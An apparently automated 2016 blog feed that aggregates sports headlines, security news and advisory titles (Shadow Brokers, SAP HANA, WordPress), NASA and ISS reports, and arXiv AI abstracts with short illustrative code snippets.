Saturday, August 20, 2016

Orioles: C Matt Wieters placed on paternity leave list; P Odrisamer Despaigne, C Francisco Pena recalled from Triple-A (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Java Next Generation
Sourcing Java Talent for exclusive roles in Dublin, Ireland the Tech Hub of Europe. Positions Recruited by @NextGenRecruit
Dublin City, Ireland
https://t.co/xmhgEvXNej
Following: 1815 - Followers: 2861

August 20, 2016 at 12:49PM via Twitter http://twitter.com/java_ng

Does your WebCam Crash after Windows 10 Anniversary Update? Here’s How to Fix It

If your webcam has stopped working after installing Microsoft's recently released Anniversary Update for Windows 10, you are not alone. Along with some significant changes intended to improve the Windows experience, the Windows 10 Anniversary Update changed the way webcams are supported, rendering a number of different webcams inoperable and causing serious issues not only for consumers but also for the enterprise.


from The Hacker News http://ift.tt/2btw9Pm
via IFTTT

Emotions Anonymous

Emotions Anonymous. Tuesday, September 6, 2016, 6:00pm to 8:00pm. San Marco Branch Library. Exploring emotions; negative to positive.

from Google Alert - anonymous http://ift.tt/2b67eCg
via IFTTT

So it is a pumpkin!


via Instagram http://ift.tt/2bSv6cq

Leaked Exploits are Legit and Belong to NSA: Cisco, Fortinet and Snowden Docs Confirm

Last week, a group calling itself "The Shadow Brokers" published what it said was a set of NSA "cyber weapons," including some working exploits for the Internet's most crucial network infrastructure, apparently stolen from the agency's Equation Group in 2013. Now, speaking to the authenticity of those exploits, The Intercept published Friday a new set of documents from the Edward Snowden archive…


from The Hacker News http://ift.tt/2bt1jX6
via IFTTT

[FD] Path traversal vulnerability in WordPress Core Ajax handlers

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Lambda (anonymous/first class procedures) and custom reporters

Beetle Blocks (a program similar to Scratch for making 3D graphics) has the report block. It's a cap block. This is what it looks like: report () :: cap grey
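
The idea translates directly to text-based languages: a custom reporter is just a procedure that returns a value, and a lambda is an anonymous, first-class one. A rough Python analog (illustrative only, not Beetle Blocks code):

```python
# A 'reporter' is a procedure that reports (returns) a value; the
# report block in Beetle Blocks/Snap! corresponds to 'return' here.
def make_scaler(factor):
    # The lambda below is an anonymous, first-class reporter built on
    # the fly, like a ring-ified block in a blocks language.
    return lambda x: factor * x   # report (factor * x)

double = make_scaler(2)           # reporters can be passed around as values
print(double(21))                 # -> 42
```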

from Google Alert - anonymous http://ift.tt/2bEG81u
via IFTTT

Perseid Fireball at Sunset Crater


On the night of August 12, this bright Perseid meteor flashed above volcanic Sunset Crater National Monument, Arizona, USA, planet Earth. Streaking along the summer Milky Way, its initial color is likely due to the shower meteor's characteristically high speed. Entering at 60 kilometers per second, Perseid meteors are capable of exciting green emission from oxygen atoms while passing through the tenuous atmosphere at high altitudes. Also characteristic of bright meteors, this Perseid left a visibly glowing persistent train. Its evolution is seen over a three-minute sequence (left to right) spanning the bottom of the frame. The camera ultimately captured a dramatic time-lapse video of the twisting, drifting train. via NASA http://ift.tt/2byQIpz

Study Domain for the Arctic-Boreal Vulnerability Experiment

Climate change in the Arctic and Boreal region is unfolding faster than anywhere else on Earth, resulting in reduced Arctic sea ice, thawing of permafrost soils, decomposition of long-frozen organic matter, widespread changes to lakes, rivers, and coastlines, and alterations of ecosystem structure and function. NASA's Terrestrial Ecology Program is conducting a major field campaign, the Arctic-Boreal Vulnerability Experiment (ABoVE), in Alaska and western Canada for 8 to 10 years, starting in 2015. ABoVE seeks a better understanding of the vulnerability and resilience of ecosystems and society to this changing environment. The image shown here outlines the core region of the study domain in red and the extended region of the study domain in purple. ABoVE's science objectives are broadly focused on (1) gaining a better understanding of the vulnerability and resilience of Arctic and boreal ecosystems to environmental change in western North America, and (2) providing the scientific basis for informed decision-making to guide societal responses at local to international levels. Research for ABoVE will link field-based, process-level studies with geospatial data products derived from airborne and satellite sensors, providing a foundation for improving the analysis and modeling capabilities needed to understand and predict ecosystem responses and societal implications. The background shown over the study region is a spatially complete view of vegetation greenness change for all of Canada and Alaska, obtained by calculating the per-pixel NDVI trend from all available 1984-2012 peak-summer Landsat-5 and -7 surface reflectance data, establishing the mid-summer greenness trend. More information on this NDVI trend can be found here.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2boh0N9
via IFTTT

Arctic Sea Ice from March to August 2016

Satellite-based passive microwave images of the sea ice have provided a reliable tool for continuously monitoring changes in the Arctic ice since 1979. Every summer the Arctic ice cap melts down to what scientists call its "minimum" before colder weather begins to cause ice cover to increase. The first six months of 2016 were the warmest first half of any year in the recorded history of surface temperature, which goes back to 1880. Data show that the Arctic temperature increases are, relatively, much larger than those for the rest of the globe. The Japan Aerospace Exploration Agency (JAXA) provides many water-related products derived from data acquired by the Advanced Microwave Scanning Radiometer 2 (AMSR2) instrument aboard the Global Change Observation Mission 1st-Water "SHIZUKU" (GCOM-W1) satellite. Two JAXA datasets used in this animation are the 10-km daily sea ice concentration and the 10-km daily 89 GHz brightness temperature. In this animation, the daily Arctic sea ice and seasonal land cover change progress through time, from the prior sea ice maximum on March 24, 2016, through August 13, 2016. Over the water, Arctic sea ice changes from day to day, showing a running 3-day minimum sea ice concentration in the region where the concentration is greater than 15 percent. The bluish white color of the sea ice is derived from a 3-day running minimum of the AMSR2 89 GHz brightness temperature. Over the terrain, monthly data from the seasonal Blue Marble Next Generation fades slowly from month to month.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2b4CAYS
via IFTTT

Friday, August 19, 2016

Guest checkout card is saved and exposed to any other anonymous users

When a guest user checks out, his/her card gets saved with UID 0. Any other guest checking out after that will see the card's last 4 digits.

from Google Alert - anonymous http://ift.tt/2bAvd86
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-038: SAP HANA Information disclosure in EXPORT

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-040: SAP HANA potential wrong encryption

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-037: SAP HANA Potential Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-034: SAP TREX remote command execution

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-033: SAP TREX TNS Information Disclosure in NameServer

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-027: SAP HANA User information disclosure

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

Ravens: Terrell Suggs cut out fried chicken, pizza, gefilte fish to get into best shape of his career - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-026: SAP HANA SYSTEM user brute force attack

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-024: SAP HANA arbitrary audit injection via HTTP requests

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-025: SAP HANA arbitrary audit injection via SQL protocol

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-022: SAP TREX Arbitrary file write

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-021: SAP TREX Remote file read

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-020: SAP TREX Remote Directory Traversal

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-019: SAP TREX Remote Command Execution

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

[FD] Onapsis Security Advisory ONAPSIS-2016-007: SAP HANA Password Disclosure

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 08/18/2016

Mouse Epigenetics Cage Unit Maintenance: The crew completed standard maintenance activities for the Mouse Epigenetics experiment by refilling the Transportation Cage Units with water and checking the water nozzles of the individual cages. The Mouse Epigenetics investigation studies altered gene expression patterns in the organs of male mice that spend one month in space, and also examines changes in the deoxyribonucleic acid (DNA) of their offspring. Results from the investigation identify genetic alterations that happen after exposure to the microgravity environment of space.

Extravehicular Activity (EVA) Preparations: The crew spent most of the day preparing for tomorrow's EVA, completing the following:
Configured/audited tools and prepared the Equipment Lock (EL), Extravehicular Mobility Units (EMUs) and ancillary hardware.
Removed/relocated stowage from the Node 2 forward port endcone to access the forward International Docking Adapter (IDA) control panel.
Set up the IDA control panel and 2 multimeters for the Modified Androgynous Peripheral Attachment System (MAPAS) installation.
Copied EMU/Airlock contingency procedures to their iPads in the event the Station Support Computer (SSC) goes down.
Pre-EVA health check.
Pre-EVA conference with ground teams.

International Docking Adapter (IDA): Ground controllers used the Space Station Remote Manipulator System (SSRMS) to inspect the sealing surface of IDA2, and then successfully extracted the IDA from the Dragon trunk overnight. There was a delay in the removal when a tethered pyro bolt from the Latch B Flight Support Equipment (FSE) floated very close to the IDA handrail. A video inspection of the handrail confirmed that the tether was not looped around or through the handrail. The ground team continued with the IDA extraction, but the FSE bolt interfered with the bottom of the handrail and the IDA structure. The FSE bolt was freed after a sequence of adjustments with the Special Purpose Dexterous Manipulator (SPDM) robotic arm. The adjustments were very minor, and positive margin between the IDA and Dragon was verified prior to each adjustment. The IDA was maneuvered to position for the installation on Pressurized Mating Adapter (PMA) 2 during the spacewalk tomorrow morning.

MERLIN-1 False Fire Indication: MERLIN-1 was unpowered following a false fire indication. Crew members took Compound Specific Analyzer-Combustion Products (CSA-CP) readings, which were all zero. Ground teams are investigating the cause. No loss of science was incurred, as MERLIN-1 is located in the Node 1 Galley area and is used primarily for crew preference items.

Today's Planned Activities
All activities were completed unless otherwise noted.
ISS crew and ГОГУ (RSA Flight Control Management Team) weekly conference r/g 3090
FAGEN. Photography during fixation of samples / r/g 3118
FAGEN. Fixation of samples from MCK No.4 and setup in SM r/g 3117
CARDIOVECTOR. Experiment Ops r/g 3115
MOUSE Hardware Setup
ABOUT GAGARIN FROM SPACE. HAM Radio Session Leaders Club / r/g 3114
Pre-EVA Crew Health Status – Prep
Pre-EVA Crew Health Status – CMO
Pre-EVA Crew Health Status – Subject
Pille Sensors setup for USOS EVA / r/g 3120
CARDIOVECTOR. Photography of the Experiment Ops / r/g 3116
UDOD. Experiment Ops with DYKNANIYE-1 and SPRUT-2 Sets r/g 3119
Collecting surface samples from SM equipment and structures / r/g 3084
PHS hardware stow (Periodic Health Status)
ABOUT GAGARIN FROM SPACE. HAM Radio Session Leaders Club / r/g 3114
XF305 Camcorder Settings Adjustment
Mouse Epigenetics, Transportation Cage Unit, Troubleshooting, Part 1
Kulonovskiy Kristall Experiment Run. Tagup with specialists / r/g 3123
EVA Tool Config
KULONOVSKIY KRISTALL. Copy and Downlink Data / r/g 3123
EVA Procedure Review
On MCC Go Installation of a new upgraded СЗУ-ЦУ8 device at FGB БР-9ЦУ-8 system ЗУ1А operation site r/g 3095
Equipment Lock Preparation
USOS EVA Tool Audit
Final printout of EVA procedures
EVA Procedure Conference
On MCC Go: Replacement of ЗУ1Б ЭА025М device with the upgraded FGB БР-9ЦУ-8 device r/g 3095
Collecting surface samples from SM equipment and structures / r/g 3084
US EVA, NODE2 Ops in Preparation for International Docking Adapter (IDA) Installation
OTKLIK. Hardware Monitoring / r/g 1588
СОЖ Maintenance
Private medical conference before EVA from USOS
Replacement of CO2 Filter Unit ИК0501
ISS-HAM Radio Session
On-orbit hearing assessment using EARQ
Progress 432 [OA] Stowage Ops with IMS Support / r/g 3122
CUCU EVA Inhibits
Countermeasures System (CMS), Sprint Exercise, Optional
Multimeter and Camcorder Setup in N2 in preparation for IDA Installation
Physical Fitness Evaluation (on the treadmill) r/g 3100
IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop / r/g 1589
INTERACTION-2. Experiment Ops / r/g 3113
ISS HAM RADIO Power Down
Private medical conference before EVA from USOS
On-orbit hearing assessment using EARQ

Completed Task List Items
None

Ground Activities
All activities were completed unless otherwise noted.
EVA procedures review
IDA multimeter startup
Nominal ground commanding

Three-Day Look Ahead:
Friday, 08/19: IDA2 EVA
Saturday, 08/20: Post EVA cleanup activities, EVA debrief, Heart Cells media change, Mouse cage maintenance, CMO OBT
Sunday, 08/21: Crew off duty

QUICK ISS Status – Environmental Control Group:
Elektron: On
Vozdukh: Manual
[СКВ] 1 – SM Air Conditioner System ("SKV1"): On
[СКВ] 2 – SM Air Conditioner System ("SKV2"): Off
Carbon Dioxide Removal Assembly (CDRA) Lab: Operate
Carbon Dioxide Removal Assembly (CDRA) Node 3: Operate
Major Constituent Analyzer (MCA) Lab: Idle
Major Constituent Analyzer (MCA) Node 3: Operate
Oxygen Generation Assembly (OGA): Process
Urine Processing Assembly (UPA): Standby
Trace Contaminant Control System (TCCS) Lab: Off
Trace Contaminant Control System (TCCS) Node 3: Full Up

from ISS On-Orbit Status Report http://ift.tt/2blKdrH
via IFTTT

Warning — Bitcoin Users Could Be Targeted by State-Sponsored Hackers

Another day, more bad news for Bitcoin users. A leading Bitcoin information site is warning users that an upcoming version of the Blockchain consolidation software and Bitcoin wallets could most likely be targeted by "state-sponsored attackers." Recently, one of the world's most popular cryptocurrency exchanges, Bitfinex, suffered a major hack that resulted in a loss of around $72 million…


from The Hacker News http://ift.tt/2bn55g9
via IFTTT

Omegle, the Popular 'Chat with Strangers' Service Leaks Your Dirty Chats and Personal Info

Ever since the creation of online chat rooms and then social networking, people have changed the way they interact with their friends and associates. However, when it comes to anonymous chatting services, you don't even know what kinds of individuals you are dealing with. Sharing identifiable information about yourself with them could put you at risk of becoming a victim of stalking…


from The Hacker News http://ift.tt/2b1RmiJ
via IFTTT

Perseid Night at Yosemite


The 2016 Perseid meteor shower performed well on the night of August 11/12. The sky on that memorable evening was recorded from a perch overlooking Yosemite Valley, planet Earth, in this scene composed of 25 separate images selected from an all-night set of sequential exposures. Each image contains a single meteor and was placed in alignment using the background stars. The digital manipulation accounts for the Earth's rotation throughout the night and allows the explosion of colorful trails to be viewed in perspective toward the shower's radiant in the constellation Perseus. The fading alpenglow gently lights the west face of El Capitan just after sunset. Just before sunrise, a faint band of zodiacal light, or false dawn, shines upward from the east, left of Half Dome at the valley's far horizon. Car lights illuminate the valley road. Of course, the image is filled with other celestial sights from that Perseid night, including the Milky Way and the Pleiades star cluster. via NASA http://ift.tt/2bE9HTf

How to hack Online Head Ball with latest cheat tool in ipad mini

Anonymous. Shift. Advance. Grow. My Activity. Anonymous is hosting How to hack Online Head Ball with latest cheat tool in ipad mini 9 mins ago ...

from Google Alert - anonymous http://ift.tt/2bxHpq9
via IFTTT

Prompt Electron Acceleration in the Radiation Belts

On March 17, 2016, Van Allen Probe A detected a pulse of high energy electrons in the radiation belts, generated by the impact of a recent coronal mass ejection striking Earth's magnetosphere. The gradient drift speed of the electron pulse was high enough that it propagated completely around Earth and was detected by the spacecraft again as the pulse spread out in the radiation belt. Because the particles have a range of energies, the pulse spread out as it moved around Earth, generating a weaker signal the next time it hit the spacecraft.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2bkfA68
via IFTTT

Thursday, August 18, 2016

Orioles Video: Manny Machado and Chris Davis slug back-to-back home runs in the 6th inning of 13-5 blowout vs. Astros (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


Benny V
Going to save this world & take us to another, watch. |#Engineer |#Developer |#Science, #Tech, #Culture, & #Data lover | Web & App Developer at BluePrint
Atlanta, GA
https://t.co/Dmj83J7nvl
Following: 1734 - Followers: 12511

August 18, 2016 at 09:39PM via Twitter http://twitter.com/OyeBenny

Anonymous donor gives money to library in honor of late Harlan Co. teen

(WYMT) - An anonymous donor gave $2,500 to the Evarts Public Library in honor of a Harlan County teen who died years ago. The library found out ...

from Google Alert - anonymous http://ift.tt/2b5rw9h
via IFTTT

Effective Multi-step Temporal-Difference Learning for Non-Linear Function Approximation. (arXiv:1608.05151v1 [cs.AI])

Multi-step temporal-difference (TD) learning, where the update targets contain information from multiple time steps ahead, is one of the most popular forms of TD learning for linear function approximation. The reason is that multi-step methods often yield substantially better performance than their single-step counterparts, due to a lower bias of the update targets. For non-linear function approximation, however, single-step methods appear to be the norm. Part of the reason could be that on many domains the popular multi-step methods TD($\lambda$) and Sarsa($\lambda$) do not perform well when combined with non-linear function approximation. In particular, they are very susceptible to divergence of value estimates. In this paper, we identify the reason behind this. Furthermore, based on our analysis, we propose a new multi-step TD method for non-linear function approximation that addresses this issue. We confirm the effectiveness of our method using two benchmark tasks with neural networks as function approximation.
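
For readers new to the setup, the n-step target that such methods regress toward mixes observed rewards with a bootstrapped value estimate. A minimal sketch (illustrative code, not the paper's):

```python
def n_step_td_target(rewards, values, t, n, gamma=0.99):
    """G = r_t + gamma*r_{t+1} + ... + gamma^(n-1)*r_{t+n-1} + gamma^n * V(s_{t+n})."""
    G, discount, T = 0.0, 1.0, len(rewards)
    for i in range(n):
        if t + i >= T:                     # episode ended before n steps elapsed
            return G
        G += discount * rewards[t + i]
        discount *= gamma
    return G + discount * values[t + n]    # bootstrap from the value estimate

# One-step vs. three-step targets computed from the same rollout.
rewards = [0.0, 0.0, 1.0, 0.0]
values = [0.1, 0.2, 0.5, 0.3, 0.0]         # V(s_0) ... V(s_4)
print(n_step_td_target(rewards, values, t=0, n=1))  # leans on V: higher bias
print(n_step_td_target(rewards, values, t=0, n=3))  # leans on rewards: lower bias
```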



from cs.AI updates on arXiv.org http://ift.tt/2bjNhEW
via IFTTT

Accelerating Exact and Approximate Inference for (Distributed) Discrete Optimization with GPUs. (arXiv:1608.05288v1 [cs.AI])

Discrete optimization is a central problem in artificial intelligence. The optimization of the aggregated cost of a network of cost functions arises in a variety of problems including (W)CSP, DCOP, as well as optimization in stochastic variants such as Bayesian networks. Inference-based algorithms are powerful techniques for solving discrete optimization problems, which can be used independently or in combination with other techniques. However, their applicability is often limited by their compute intensive nature and their space requirements. This paper proposes the design and implementation of a novel inference-based technique, which exploits modern massively parallel architectures, such as those found in Graphical Processing Units (GPUs), to speed up the resolution of exact and approximated inference-based algorithms for discrete optimization. The paper studies the proposed algorithm in both centralized and distributed optimization contexts. The paper demonstrates that the use of GPUs provides significant advantages in terms of runtime and scalability, achieving up to two orders of magnitude in speedups and showing a considerable reduction in execution time (up to 345 times faster) with respect to a sequential version.
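For intuition, the inference step such algorithms repeat is variable elimination over cost tables, and it is embarrassingly data-parallel. A toy sketch, with NumPy broadcasting standing in for the GPU kernel (illustrative, not the paper's implementation):

```python
import numpy as np

rng = np.random.default_rng(0)
d = 4                                 # domain size of each discrete variable
f1 = rng.integers(0, 10, (d, d))      # cost function f1[x, y]
f2 = rng.integers(0, 10, (d, d))      # cost function f2[y, z]

# Eliminate y: g(x, z) = min over y of f1(x, y) + f2(y, z).
# Broadcasting scores every (x, y, z) combination at once; a GPU kernel
# would assign these independent cells to parallel threads.
combined = f1[:, :, None] + f2[None, :, :]   # shape (x, y, z)
g = combined.min(axis=1)                      # minimize y out

print("optimal aggregated cost:", g.min())
```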



from cs.AI updates on arXiv.org http://ift.tt/2bN5yh6
via IFTTT

Probabilistic Data Analysis with Probabilistic Programming. (arXiv:1608.05347v1 [cs.AI])

Probabilistic techniques are central to data analysis, but different approaches can be difficult to apply, combine, and compare. This paper introduces composable generative population models (CGPMs), a computational abstraction that extends directed graphical models and can be used to describe and compose a broad class of probabilistic data analysis techniques. Examples include hierarchical Bayesian models, multivariate kernel methods, discriminative machine learning, clustering algorithms, dimensionality reduction, and arbitrary probabilistic programs. We also demonstrate the integration of CGPMs into BayesDB, a probabilistic programming platform that can express data analysis tasks using a modeling language and a structured query language. The practical value is illustrated in two ways. First, CGPMs are used in an analysis that identifies satellite data records which probably violate Kepler's Third Law, by composing causal probabilistic programs with non-parametric Bayes in under 50 lines of probabilistic code. Second, for several representative data analysis tasks, we report on lines of code and accuracy measurements of various CGPMs, plus comparisons with standard baseline solutions from Python and MATLAB libraries.
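The key abstraction is an interface, not a single algorithm: every CGPM can simulate from, and score data under, its distribution, which is what makes composition possible. A toy, hypothetical stand-in (not the BayesDB API):

```python
import numpy as np

rng = np.random.default_rng(0)

class MixtureCGPM:
    """Toy generative population model: a Gaussian mixture exposing the
    two core CGPM operations, simulate and logpdf."""
    def __init__(self, weights, means, stds):
        self.w, self.mu, self.sd = map(np.asarray, (weights, means, stds))
    def simulate(self, n):
        ks = rng.choice(len(self.w), size=n, p=self.w)
        return rng.normal(self.mu[ks], self.sd[ks])
    def logpdf(self, x):
        # log sum_k w_k * Normal(x; mu_k, sd_k)
        comp = -0.5 * ((x - self.mu) / self.sd) ** 2 - np.log(self.sd * np.sqrt(2 * np.pi))
        return np.logaddexp.reduce(np.log(self.w) + comp)

m = MixtureCGPM([0.7, 0.3], [0.0, 5.0], [1.0, 0.5])
print(m.simulate(5))
print(m.logpdf(4.8))
```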



from cs.AI updates on arXiv.org http://ift.tt/2bjNbNF
via IFTTT

On the expressive power of deep neural networks. (arXiv:1606.05336v3 [stat.ML] UPDATED)

We study the effects of the depth and width of a neural network on its expressive power. Precise theoretical and experimental results are derived in the generic setting of neural networks after random initialization. We find that three different measures of functional expressivity (number of transitions, a measure of non-linearity/complexity; network activation patterns, a new definition with an intrinsic link to hyperplane arrangements in input space; and number of dichotomies) show an exponential dependence on depth but not width. These three measures are related to each other and are also directly proportional to a fourth quantity, trajectory length. Most crucially, we show, both theoretically and experimentally, that trajectory length grows exponentially with depth, which is why all three measures display an exponential dependence on depth.

These results also suggest that parameters earlier in the network have greater influence over the expressive power of the network. So for any layer, its influence on expressivity is determined by the remaining depth of the network after that layer, which is supported by experiments on fully connected and convolutional networks on MNIST and CIFAR-10.
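
Trajectory length, the fourth quantity, is easy to measure directly: push a simple input curve through a randomly initialized network and compute the arc length of its image. A small sketch (assumed hyperparameters; weights drawn N(0, sigma_w^2/width) as in the random-initialization setting):

```python
import numpy as np

rng = np.random.default_rng(1)

def trajectory_length(depth, width=100, n_points=500, sigma_w=2.0):
    """Arc length of the image of a unit circle after `depth` random ReLU layers."""
    theta = np.linspace(0.0, 2.0 * np.pi, n_points)
    h = np.stack([np.cos(theta), np.sin(theta)], axis=1)   # the input trajectory
    for _ in range(depth):
        W = rng.normal(0.0, sigma_w / np.sqrt(h.shape[1]), (h.shape[1], width))
        h = np.maximum(h @ W, 0.0)                          # one ReLU layer
    return np.linalg.norm(np.diff(h, axis=0), axis=1).sum()

for depth in (1, 2, 4, 8):
    print(depth, trajectory_length(depth))   # length grows roughly exponentially
```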



from cs.AI updates on arXiv.org http://ift.tt/1tznj7m
via IFTTT

A Convolutional Autoencoder for Multi-Subject fMRI Data Aggregation. (arXiv:1608.04846v1 [stat.ML])

Finding the most effective way to aggregate multi-subject fMRI data is a long-standing and challenging problem. It is of increasing interest in contemporary fMRI studies of human cognition due to the scarcity of data per subject and the variability of brain anatomy and functional response across subjects. Recent work on latent factor models shows promising results in this task, but this approach does not preserve spatial locality in the brain. We examine two ways to combine the ideas of a factor model and a searchlight based analysis to aggregate multi-subject fMRI data while preserving spatial locality. We first do this directly by combining a recent factor method known as a shared response model with searchlight analysis. Then we design a multi-view convolutional autoencoder for the same task. Both approaches preserve spatial locality and have competitive or better performance compared with standard searchlight analysis and the shared response model applied across the whole brain. We also report a system design to handle the computational challenge of training the convolutional autoencoder.
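
For scale, the convolutional core of such a model is small. The sketch below (PyTorch, random tensors in place of real fMRI patches, a single view rather than the paper's multi-view setup) shows why convolutions preserve spatial locality: every feature is computed from a local 3x3x3 voxel neighborhood:

```python
import torch
import torch.nn as nn

x = torch.randn(16, 1, 8, 8, 8)   # toy batch: 1-channel 8x8x8 voxel patches

encoder = nn.Sequential(
    nn.Conv3d(1, 8, kernel_size=3, padding=1), nn.ReLU(),
    nn.Conv3d(8, 4, kernel_size=3, padding=1), nn.ReLU(),
)
decoder = nn.Sequential(
    nn.Conv3d(4, 8, kernel_size=3, padding=1), nn.ReLU(),
    nn.Conv3d(8, 1, kernel_size=3, padding=1),
)

params = list(encoder.parameters()) + list(decoder.parameters())
opt = torch.optim.Adam(params, lr=1e-3)
for step in range(100):
    opt.zero_grad()
    loss = nn.functional.mse_loss(decoder(encoder(x)), x)  # reconstruction loss
    loss.backward()
    opt.step()
print("final reconstruction loss:", float(loss))
```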



from cs.AI updates on arXiv.org http://ift.tt/2b2i1L3
via IFTTT

[FD] Onapsis Security Advisory ONAPSIS-2016-006: SAP HANA Get Topology Information

-----BEGIN PGP SIGNED MESSAGE-----

Source: Gmail -> IFTTT-> Blogger

Anonymous

Anonymous · wordpress-2 | 17th August 2016. Was followed to my hotel in SE Asia on a solo business trip by an older man. He started talking to me ...

from Google Alert - anonymous http://ift.tt/2blHlsW
via IFTTT

Microsoft Open Sources PowerShell; Now Available for Linux and Mac OS X

'Microsoft loves Linux' and this has never been more true than now. Microsoft today made its PowerShell scripting language and command-line shell available to the open source developer community on GitHub under the permissive MIT license. The company has also launched alpha versions of PowerShell for Linux (specifically Red Hat, Ubuntu, and CentOS) and Mac OS X, in addition…


from The Hacker News http://ift.tt/2b262Q6
via IFTTT

I have a new follower on Twitter


AthelstanSearch
Analytics Talent in FinTech. #Analytics #FinTech #Athelstan
London
https://t.co/zMFXpNe9Qp
Following: 2456 - Followers: 827

August 18, 2016 at 09:25AM via Twitter http://twitter.com/AthelstanSearch

ISS Daily Summary Report – 08/17/2016

Fluid Shifts Operations in the Service Module: With ground team assistance, crewmembers performed Fluid Shifts imaging exams by configuring the Optical Coherence Tomography (OCT) and the Distortion Product Otoacoustic Emission (DPOAE) hardware, before completing a DPOAE test, OCT exam, and a Tonometry exam. The purpose of this investigation is to characterize the space flight-induced fluid shift, including intra- and extravascular shifts, intra- and extracellular shifts, changes in total body water and lower vs. upper body shifts. Results from this investigation are expected to help define the causes of the ocular structure and vision changes associated with long duration space flight, and assist in the development of countermeasures.

Biological Research in Canisters Natural Products (BRIC-NP) Cold Stowage Preparation: The crew retrieved the BRIC-NP canisters from EXPRESS Rack 2 and inserted them in the Glacier for return on SpX-9. In the BRIC-NP investigation, radiation-tolerant fungal strains isolated from the Chernobyl nuclear power plant are exposed to spaceflight conditions on board the ISS, then screened for the biological production of beneficial medical or agricultural substances.

eValuatIon And monitoring of microBiofiLms insidE the ISS (ViABLE) Payload Return: The crew photographed all four ViABLE Bags inside the Functional Cargo Block (FGB) locker before removing and inserting each one into separate ViABLE Return Bags and placing them into Ziploc bags for return on SpX-9. ViABLE involves the evaluation of microbial biofilm development on metallic and textile space materials located inside and on the cover of Nomex pouches. Microbial biofilms are known for causing damage and contamination on the Mir space station and the ISS. The potential application of novel methodologies and products to treat space materials may lead to improvements in the environmental quality of confined human habitats in space and on Earth.

Habitability Human Factors Directed Observations: The crew recorded and submitted a walk-through video documenting observations of life onboard ISS, providing insight related to human factors and habitability. The Habitability investigation collects observations about the relationship between crew members and their environment on the ISS. Observations can help spacecraft designers understand how much habitable volume is required, and whether a mission's duration impacts how much space crew members need.

Dose Tracker: The Dose Tracker app was configured and the crew completed entries for medication tracking on an iPad. This investigation documents the medication usage of crewmembers before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data is expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) are occurring during missions.

Oxygen Generation System (OGS) Hydrogen (H2) Sensor Remove & Replace (R&R): The crew completed OGS H2 sensor Orbital Replacement Unit (ORU) purge adapter operations, R&R of the H2 sensor ORU, and AAA cleaning with inlet inspection and cleaning. This activity was scheduled due to ORU end-of-life.

Urine Processing Assembly (UPA) Sample Collection: The UPA Distillate Filter and Purge Filter were removed and replaced for return samples in support of the UPA elevated conductivity investigation. The preceding UPA process cycle had elevated conductivity levels, and the samples will help ground teams understand the difference in conductivity with the purge line reconnected.

Waste and Hygiene Compartment (WHC) Check Separator Light: To isolate the cause of Check Separator Light illumination, the crew performed an inspection of the hoses and electrical connections on the Urine Receptacle. They reported that the electrical cable on the Urine Receptacle was coiled tightly and may be kinked. They removed the zip tie that was holding the cable together to allow more slack and demated/remated the XT2 connector. Additional troubleshooting steps are in work for the crew to perform as a result of yesterday's Flight Investigation Team (FIT) recommendations.

Extravehicular Robotics Operations: Yesterday afternoon, Robotics Ground Controllers maneuvered the Space Station Remote Manipulator System (SSRMS) to unstow the Special Purpose Dexterous Manipulator (SPDM). Following SPDM unstow, they maneuvered the SSRMS to position it over the SpX-9 Dragon Trunk and configured the SPDM to extract the International Docking Adapter 2 (IDA2) from the trunk later today. SPDM checkouts were also completed in preparation for the IDA2 Extravehicular Activity (EVA) this Friday.

Today's Planned Activities
All activities were completed unless otherwise noted.
Calf Volume Measurement / r/g 3080
FLUID SHIFTS. Comm configuration for the experiment / r/g 9995
FLUID SHIFTS. Gathering and Connecting Equipment for TV coverage
Soyuz 731 Samsung Tablet Recharge, initiate
Biological Research in Canisters Natural Products Stowage Preparation
Study of veins in lower extremities / r/g 3081
Microgravity Science Glovebox (MSG) Video file transfer to flash drive
BRICNP. Sample Insertion into Glacier
OGA Hydrogen Sensor R&R
